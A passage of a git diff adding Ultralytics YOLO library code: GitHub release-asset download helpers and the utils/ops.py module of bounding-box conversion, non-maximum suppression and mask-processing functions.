LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. + download_url = f"https://github.com/{repo}/releases/download" + if str(file).startswith(("http:/", "https:/")): # download + url = str(file).replace(":/", "://") # Pathlib turns :// -> :/ + file = url2file(name) # parse authentication https://url.com/file.txt?auth... + if Path(file).is_file(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + safe_download(url=url, file=file, min_bytes=1e5, **kwargs) + + elif repo == GITHUB_ASSETS_REPO and name in GITHUB_ASSETS_NAMES: + safe_download(url=f"{download_url}/{release}/{name}", file=file, min_bytes=1e5, **kwargs) + + else: + tag, assets = get_github_assets(repo, release) + if not assets: + tag, assets = get_github_assets(repo) # latest release + if name in assets: + safe_download(url=f"{download_url}/{tag}/{name}", file=file, min_bytes=1e5, **kwargs) + + return str(file) + + +def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False): + """ + Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are + specified. + + Args: + url (str | list): The URL or list of URLs of the files to be downloaded. + dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory. + unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True. + delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False. + curl (bool, optional): Flag to use curl for downloading. Defaults to False. + threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1. + retry (int, optional): Number of retries in case of download failure. Defaults to 3. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + + Example: + ```python + download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True) + ``` + """ + dir = Path(dir) + dir.mkdir(parents=True, exist_ok=True) # make directory + if threads > 1: + with ThreadPool(threads) as pool: + pool.map( + lambda x: safe_download( + url=x[0], + dir=x[1], + unzip=unzip, + delete=delete, + curl=curl, + retry=retry, + exist_ok=exist_ok, + progress=threads <= 1, + ), + zip(url, repeat(dir)), + ) + pool.close() + pool.join() + else: + for u in [url] if isinstance(url, (str, Path)) else url: + safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok) diff --git a/2024.ultralytics/v8.3.40/utils/ops.py b/2024.ultralytics/v8.3.40/utils/ops.py new file mode 100644 index 0000000..ac53546 --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/ops.py @@ -0,0 +1,839 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import contextlib +import math +import re +import time + +import cv2 +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.utils import LOGGER +from ultralytics.utils.metrics import batch_probiou + + +class Profile(contextlib.ContextDecorator): + """ + YOLOv8 Profile class. Use as a decorator with @Profile() or as a context manager with 'with Profile():'. + + Example: + ```python + from ultralytics.utils.ops import Profile + + with Profile(device=device) as dt: + pass # slow operation here + + print(dt) # prints "Elapsed time is 9.5367431640625e-07 s" + ``` + """ + + def __init__(self, t=0.0, device: torch.device = None): + """ + Initialize the Profile class. + + Args: + t (float): Initial time. Defaults to 0.0. + device (torch.device): Devices used for model inference. Defaults to None (cpu). + """ + self.t = t + self.device = device + self.cuda = bool(device and str(device).startswith("cuda")) + + def __enter__(self): + """Start timing.""" + self.start = self.time() + return self + + def __exit__(self, type, value, traceback): # noqa + """Stop timing.""" + self.dt = self.time() - self.start # delta-time + self.t += self.dt # accumulate dt + + def __str__(self): + """Returns a human-readable string representing the accumulated elapsed time in the profiler.""" + return f"Elapsed time is {self.t} s" + + def time(self): + """Get current time.""" + if self.cuda: + torch.cuda.synchronize(self.device) + return time.time() + + +def segment2box(segment, width=640, height=640): + """ + Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy). + + Args: + segment (torch.Tensor): the segment label + width (int): the width of the image. Defaults to 640 + height (int): The height of the image. Defaults to 640 + + Returns: + (np.ndarray): the minimum and maximum x and y values of the segment. + """ + x, y = segment.T # segment xy + x = x.clip(0, width) + y = y.clip(0, height) + return ( + np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype) + if any(x) + else np.zeros(4, dtype=segment.dtype) + ) # xyxy + + +def scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None, padding=True, xywh=False): + """ + Rescales bounding boxes (in the format of xyxy by default) from the shape of the image they were originally + specified in (img1_shape) to the shape of a different image (img0_shape). + + Args: + img1_shape (tuple): The shape of the image that the bounding boxes are for, in the format of (height, width). + boxes (torch.Tensor): the bounding boxes of the objects in the image, in the format of (x1, y1, x2, y2) + img0_shape (tuple): the shape of the target image, in the format of (height, width). + ratio_pad (tuple): a tuple of (ratio, pad) for scaling the boxes. If not provided, the ratio and pad will be + calculated based on the size difference between the two images. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + xywh (bool): The box format is xywh or not, default=False. + + Returns: + boxes (torch.Tensor): The scaled bounding boxes, in the format of (x1, y1, x2, y2) + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = ( + round((img1_shape[1] - img0_shape[1] * gain) / 2 - 0.1), + round((img1_shape[0] - img0_shape[0] * gain) / 2 - 0.1), + ) # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + boxes[..., 0] -= pad[0] # x padding + boxes[..., 1] -= pad[1] # y padding + if not xywh: + boxes[..., 2] -= pad[0] # x padding + boxes[..., 3] -= pad[1] # y padding + boxes[..., :4] /= gain + return clip_boxes(boxes, img0_shape) + + +def make_divisible(x, divisor): + """ + Returns the nearest number that is divisible by the given divisor. + + Args: + x (int): The number to make divisible. + divisor (int | torch.Tensor): The divisor. + + Returns: + (int): The nearest number divisible by the divisor. + """ + if isinstance(divisor, torch.Tensor): + divisor = int(divisor.max()) # to int + return math.ceil(x / divisor) * divisor + + +def nms_rotated(boxes, scores, threshold=0.45): + """ + NMS for oriented bounding boxes using probiou and fast-nms. + + Args: + boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr. + scores (torch.Tensor): Confidence scores, shape (N,). + threshold (float, optional): IoU threshold. Defaults to 0.45. + + Returns: + (torch.Tensor): Indices of boxes to keep after NMS. + """ + if len(boxes) == 0: + return np.empty((0,), dtype=np.int8) + sorted_idx = torch.argsort(scores, descending=True) + boxes = boxes[sorted_idx] + ious = batch_probiou(boxes, boxes).triu_(diagonal=1) + pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1) + return sorted_idx[pick] + + +def non_max_suppression( + prediction, + conf_thres=0.25, + iou_thres=0.45, + classes=None, + agnostic=False, + multi_label=False, + labels=(), + max_det=300, + nc=0, # number of classes (optional) + max_time_img=0.05, + max_nms=30000, + max_wh=7680, + in_place=True, + rotated=False, +): + """ + Perform non-maximum suppression (NMS) on a set of boxes, with support for masks and multiple labels per box. + + Args: + prediction (torch.Tensor): A tensor of shape (batch_size, num_classes + 4 + num_masks, num_boxes) + containing the predicted boxes, classes, and masks. The tensor should be in the format + output by a model, such as YOLO. + conf_thres (float): The confidence threshold below which boxes will be filtered out. + Valid values are between 0.0 and 1.0. + iou_thres (float): The IoU threshold below which boxes will be filtered out during NMS. + Valid values are between 0.0 and 1.0. + classes (List[int]): A list of class indices to consider. If None, all classes will be considered. + agnostic (bool): If True, the model is agnostic to the number of classes, and all + classes will be considered as one. + multi_label (bool): If True, each box may have multiple labels. + labels (List[List[Union[int, float, torch.Tensor]]]): A list of lists, where each inner + list contains the apriori labels for a given image. The list should be in the format + output by a dataloader, with each label being a tuple of (class_index, x1, y1, x2, y2). + max_det (int): The maximum number of boxes to keep after NMS. + nc (int, optional): The number of classes output by the model. Any indices after this will be considered masks. + max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. + """ + if isinstance(boxes, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + boxes[..., 0] = boxes[..., 0].clamp(0, shape[1]) # x1 + boxes[..., 1] = boxes[..., 1].clamp(0, shape[0]) # y1 + boxes[..., 2] = boxes[..., 2].clamp(0, shape[1]) # x2 + boxes[..., 3] = boxes[..., 3].clamp(0, shape[0]) # y2 + else: # np.array (faster grouped) + boxes[..., [0, 2]] = boxes[..., [0, 2]].clip(0, shape[1]) # x1, x2 + boxes[..., [1, 3]] = boxes[..., [1, 3]].clip(0, shape[0]) # y1, y2 + return boxes + + +def clip_coords(coords, shape): + """ + Clip line coordinates to the image boundaries. + + Args: + coords (torch.Tensor | numpy.ndarray): A list of line coordinates. + shape (tuple): A tuple of integers representing the size of the image in the format (height, width). + + Returns: + (torch.Tensor | numpy.ndarray): Clipped coordinates + """ + if isinstance(coords, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + coords[..., 0] = coords[..., 0].clamp(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clamp(0, shape[0]) # y + else: # np.array (faster grouped) + coords[..., 0] = coords[..., 0].clip(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clip(0, shape[0]) # y + return coords + + +def scale_image(masks, im0_shape, ratio_pad=None): + """ + Takes a mask, and resizes it to the original image size. + + Args: + masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3]. + im0_shape (tuple): The original image shape. + ratio_pad (tuple): The ratio of the padding to the original image. + + Returns: + masks (np.ndarray): The masks that are being returned with shape [h, w, num]. + """ + # Rescale coordinates (xyxy) from im1_shape to im0_shape + im1_shape = masks.shape + if im1_shape[:2] == im0_shape[:2]: + return masks + if ratio_pad is None: # calculate from im0_shape + gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1]) # gain = old / new + pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2 # wh padding + else: + # gain = ratio_pad[0][0] + pad = ratio_pad[1] + top, left = int(pad[1]), int(pad[0]) # y, x + bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0]) + + if len(masks.shape) < 2: + raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}') + masks = masks[top:bottom, left:right] + masks = cv2.resize(masks, (im0_shape[1], im0_shape[0])) + if len(masks.shape) == 2: + masks = masks[:, :, None] + + return masks + + +def xyxy2xywh(x): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center + y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def xywh2xyxy(x): + """ + Convert bounding box coordinates from (x, y, width, height) format to (x1, y1, x2, y2) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. Note: ops per 2 channels faster than per channel. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x, y, width, height) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x1, y1, x2, y2) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + xy = x[..., :2] # centers + wh = x[..., 2:] / 2 # half width-height + y[..., :2] = xy - wh # top left xy + y[..., 2:] = xy + wh # bottom right xy + return y + + +def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): + """ + Convert normalized bounding box coordinates to pixel coordinates. + + Args: + x (np.ndarray | torch.Tensor): The bounding box coordinates. + w (int): Width of the image. Defaults to 640 + h (int): Height of the image. Defaults to 640 + padw (int): Padding width. Defaults to 0 + padh (int): Padding height. Defaults to 0 + Returns: + y (np.ndarray | torch.Tensor): The coordinates of the bounding box in the format [x1, y1, x2, y2] where + x1,y1 is the top-left corner, x2,y2 is the bottom-right corner of the bounding box. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = w * (x[..., 0] - x[..., 2] / 2) + padw # top left x + y[..., 1] = h * (x[..., 1] - x[..., 3] / 2) + padh # top left y + y[..., 2] = w * (x[..., 0] + x[..., 2] / 2) + padw # bottom right x + y[..., 3] = h * (x[..., 1] + x[..., 3] / 2) + padh # bottom right y + return y + + +def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height, normalized) format. x, y, + width and height are normalized to image dimensions. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + w (int): The width of the image. Defaults to 640 + h (int): The height of the image. Defaults to 640 + clip (bool): If True, the boxes will be clipped to the image boundaries. Defaults to False + eps (float): The minimum value of the box's width and height. Defaults to 0.0 + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height, normalized) format + """ + if clip: + x = clip_boxes(x, (h - eps, w - eps)) + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = torch.empty_like(x) if isinstance(x, torch.Tensor) else np.empty_like(x) # faster than clone/copy + y[..., 0] = ((x[..., 0] + x[..., 2]) / 2) / w # x center + y[..., 1] = ((x[..., 1] + x[..., 3]) / 2) / h # y center + y[..., 2] = (x[..., 2] - x[..., 0]) / w # width + y[..., 3] = (x[..., 3] - x[..., 1]) / h # height + return y + + +def xywh2ltwh(x): + """ + Convert the bounding box format from [x, y, w, h] to [x1, y1, w, h], where x1, y1 are the top-left coordinates. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding box coordinates in the xywh format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] - x[..., 2] / 2 # top left x + y[..., 1] = x[..., 1] - x[..., 3] / 2 # top left y + return y + + +def xyxy2ltwh(x): + """ + Convert nx4 bounding boxes from [x1, y1, x2, y2] to [x1, y1, w, h], where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding boxes coordinates in the xyxy format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def ltwh2xywh(x): + """ + Convert nx4 boxes from [x1, y1, w, h] to [x, y, w, h] where xy1=top-left, xy=center. + + Args: + x (torch.Tensor): the input tensor + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xywh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] + x[..., 2] / 2 # center x + y[..., 1] = x[..., 1] + x[..., 3] / 2 # center y + return y + + +def xyxyxyxy2xywhr(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xy1, xy2, xy3, xy4] to [xywh, rotation]. Rotation values are + returned in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8). + + Returns: + (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). + """ + is_torch = isinstance(x, torch.Tensor) + points = x.cpu().numpy() if is_torch else x + points = points.reshape(len(x), -1, 2) + rboxes = [] + for pts in points: + # NOTE: Use cv2.minAreaRect to get accurate xywhr, + # especially some objects are cut off by augmentations in dataloader. + (cx, cy), (w, h), angle = cv2.minAreaRect(pts) + rboxes.append([cx, cy, w, h, angle / 180 * np.pi]) + return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes) + + +def xywhr2xyxyxyxy(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xywh, rotation] to [xy1, xy2, xy3, xy4]. Rotation values should + be in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Boxes in [cx, cy, w, h, rotation] format of shape (n, 5) or (b, n, 5). + + Returns: + (numpy.ndarray | torch.Tensor): Converted corner points of shape (n, 4, 2) or (b, n, 4, 2). + """ + cos, sin, cat, stack = ( + (torch.cos, torch.sin, torch.cat, torch.stack) + if isinstance(x, torch.Tensor) + else (np.cos, np.sin, np.concatenate, np.stack) + ) + + ctr = x[..., :2] + w, h, angle = (x[..., i : i + 1] for i in range(2, 5)) + cos_value, sin_value = cos(angle), sin(angle) + vec1 = [w / 2 * cos_value, w / 2 * sin_value] + vec2 = [-h / 2 * sin_value, h / 2 * cos_value] + vec1 = cat(vec1, -1) + vec2 = cat(vec2, -1) + pt1 = ctr + vec1 + vec2 + pt2 = ctr + vec1 - vec2 + pt3 = ctr - vec1 - vec2 + pt4 = ctr - vec1 + vec2 + return stack([pt1, pt2, pt3, pt4], -2) + + +def ltwh2xyxy(x): + """ + It converts the bounding box from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): the input image + + Returns: + y (np.ndarray | torch.Tensor): the xyxy coordinates of the bounding boxes. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] + x[..., 0] # width + y[..., 3] = x[..., 3] + x[..., 1] # height + return y + + +def segments2boxes(segments): + """ + It converts segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh). + + Args: + segments (list): list of segments, each segment is a list of points, each point is a list of x, y coordinates + + Returns: + (np.ndarray): the xywh coordinates of the bounding boxes. + """ + boxes = [] + for s in segments: + x, y = s.T # segment xy + boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy + return xyxy2xywh(np.array(boxes)) # cls, xywh + + +def resample_segments(segments, n=1000): + """ + Inputs a list of segments (n,2) and returns a list of segments (n,2) up-sampled to n points each. + + Args: + segments (list): a list of (n,2) arrays, where n is the number of points in the segment. + n (int): number of points to resample the segment to. Defaults to 1000 + + Returns: + segments (list): the resampled segments. + """ + for i, s in enumerate(segments): + s = np.concatenate((s, s[0:1, :]), axis=0) + x = np.linspace(0, len(s) - 1, n) + xp = np.arange(len(s)) + segments[i] = ( + np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)], dtype=np.float32).reshape(2, -1).T + ) # segment xy + return segments + + +def crop_mask(masks, boxes): + """ + It takes a mask and a bounding box, and returns a mask that is cropped to the bounding box. + + Args: + masks (torch.Tensor): [n, h, w] tensor of masks + boxes (torch.Tensor): [n, 4] tensor of bbox coordinates in relative point form + + Returns: + (torch.Tensor): The masks are being cropped to the bounding box. + """ + _, h, w = masks.shape + x1, y1, x2, y2 = torch.chunk(boxes[:, :, None], 4, 1) # x1 shape(n,1,1) + r = torch.arange(w, device=masks.device, dtype=x1.dtype)[None, None, :] # rows shape(1,1,w) + c = torch.arange(h, device=masks.device, dtype=x1.dtype)[None, :, None] # cols shape(1,h,1) + + return masks * ((r >= x1) * (r < x2) * (c >= y1) * (c < y2)) + + +def process_mask(protos, masks_in, bboxes, shape, upsample=False): + """ + Apply masks to bounding boxes using the output of the mask head. + + Args: + protos (torch.Tensor): A tensor of shape [mask_dim, mask_h, mask_w]. + masks_in (torch.Tensor): A tensor of shape [n, mask_dim], where n is the number of masks after NMS. + bboxes (torch.Tensor): A tensor of shape [n, 4], where n is the number of masks after NMS. + shape (tuple): A tuple of integers representing the size of the input image in the format (h, w). + upsample (bool): A flag to indicate whether to upsample the mask to the original image size. Default is False. + + Returns: + (torch.Tensor): A binary mask tensor of shape [n, h, w], where n is the number of masks after NMS, and h and w + are the height and width of the input image. The mask is applied to the bounding boxes. + """ + c, mh, mw = protos.shape # CHW + ih, iw = shape + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) # CHW + width_ratio = mw / iw + height_ratio = mh / ih + + downsampled_bboxes = bboxes.clone() + downsampled_bboxes[:, 0] *= width_ratio + downsampled_bboxes[:, 2] *= width_ratio + downsampled_bboxes[:, 3] *= height_ratio + downsampled_bboxes[:, 1] *= height_ratio + + masks = crop_mask(masks, downsampled_bboxes) # CHW + if upsample: + masks = F.interpolate(masks[None], shape, mode="bilinear", align_corners=False)[0] # CHW + return masks.gt_(0.0) + + +def process_mask_native(protos, masks_in, bboxes, shape): + """ + It takes the output of the mask head, and crops it after upsampling to the bounding boxes. + + Args: + protos (torch.Tensor): [mask_dim, mask_h, mask_w] + masks_in (torch.Tensor): [n, mask_dim], n is number of masks after nms. + bboxes (torch.Tensor): [n, 4], n is number of masks after nms. + shape (tuple): The size of the input image (h,w). + + Returns: + masks (torch.Tensor): The returned masks with dimensions [h, w, n]. + """ + c, mh, mw = protos.shape # CHW + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) + masks = scale_masks(masks[None], shape)[0] # CHW + masks = crop_mask(masks, bboxes) # CHW + return masks.gt_(0.0) + + +def scale_masks(masks, shape, padding=True): + """ + Rescale segment masks to shape. + + Args: + masks (torch.Tensor): (N, C, H, W). + shape (tuple): Height and width. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + """ + mh, mw = masks.shape[2:] + gain = min(mh / shape[0], mw / shape[1]) # gain = old / new + pad = [mw - shape[1] * gain, mh - shape[0] * gain] # wh padding + if padding: + pad[0] /= 2 + pad[1] /= 2 + top, left = (int(pad[1]), int(pad[0])) if padding else (0, 0) # y, x + bottom, right = (int(mh - pad[1]), int(mw - pad[0])) + masks = masks[..., top:bottom, left:right] + + masks = F.interpolate(masks, shape, mode="bilinear", align_corners=False) # NCHW + return masks + + +def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True): + """ + Rescale segment coordinates (xy) from img1_shape to img0_shape. + + Args: + img1_shape (tuple): The shape of the image that the coords are from. + coords (torch.Tensor): the coords to be scaled of shape n,2. + img0_shape (tuple): the shape of the image that the segmentation is being applied to. + ratio_pad (tuple): the ratio of the image size to the padded image size. + normalize (bool): If True, the coordinates will be normalized to the range [0, 1]. Defaults to False. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + + Returns: + coords (torch.Tensor): The scaled coordinates. + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + coords[..., 0] -= pad[0] # x padding + coords[..., 1] -= pad[1] # y padding + coords[..., 0] /= gain + coords[..., 1] /= gain + coords = clip_coords(coords, img0_shape) + if normalize: + coords[..., 0] /= img0_shape[1] # width + coords[..., 1] /= img0_shape[0] # height + return coords + + +def regularize_rboxes(rboxes): + """ + Regularize rotated boxes in range [0, pi/2]. + + Args: + rboxes (torch.Tensor): Input boxes of shape(N, 5) in xywhr format. + + Returns: + (torch.Tensor): The regularized boxes. + """ + x, y, w, h, t = rboxes.unbind(dim=-1) + # Swap edge and angle if h >= w + w_ = torch.where(w > h, w, h) + h_ = torch.where(w > h, h, w) + t = torch.where(w > h, t, t + math.pi / 2) % math.pi + return torch.stack([x, y, w_, h_, t], dim=-1) # regularized boxes + + +def masks2segments(masks, strategy="all"): + """ + It takes a list of masks(n,h,w) and returns a list of segments(n,xy). + + Args: + masks (torch.Tensor): the output of the model, which is a tensor of shape (batch_size, 160, 160) + strategy (str): 'all' or 'largest'. Defaults to all + + Returns: + segments (List): list of segment masks + """ + from ultralytics.data.converter import merge_multi_segment + + segments = [] + for x in masks.int().cpu().numpy().astype("uint8"): + c = 